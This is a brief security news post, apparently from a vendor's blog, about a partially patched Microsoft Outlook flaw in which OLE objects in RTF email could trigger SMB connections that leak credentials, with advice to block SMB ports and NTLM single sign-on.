Patches, including ones from Microsoft products, such as MS Outlook, appeared on the last ‘Patch Tuesday’ (the day on which Microsoft has been traditionally – since 2003 – publishing security updates). Two of them are described as:
The above vulnerability was reported and described by Will Dormann from the American CERT Coordination Center. He described the risk of unauthorized disclosure of sensitive information from Microsoft Outlook, including user login credentials. This was associated with the automatic rendering of OLE (Object Linking and Embedding) objects contained in messages in the RTF (Rich Text Format) format, while opening or previewing messages. This, in turn, enabled, for example, the initiation of a SMB connection to a host controlled by the attacker – and without any interaction with the user.
Partial patches by Microsoft – how to fix this issue?
Installing a patch only partially solves the problem, since it prevents automatic initiation of SMB connections. However, it does not restrict other possibilities of exploiting the vulnerability (e.g., link embedding). It is recommended to additionally consider blocking the ports used in SMB sessions, i.e., 445/tcp, 137/tcp, 139/tcp, as well as 137/udp and 139/udp. Blocking the NT LAN Manager (NTLM) Single Sign-on (SSO) is also advisable. Finally, a traditional recommendation – always use complex (difficult to crack) passwords!
Source: The Hacker News
—
Do you need cybersecurity solutions for your company – then contact us.
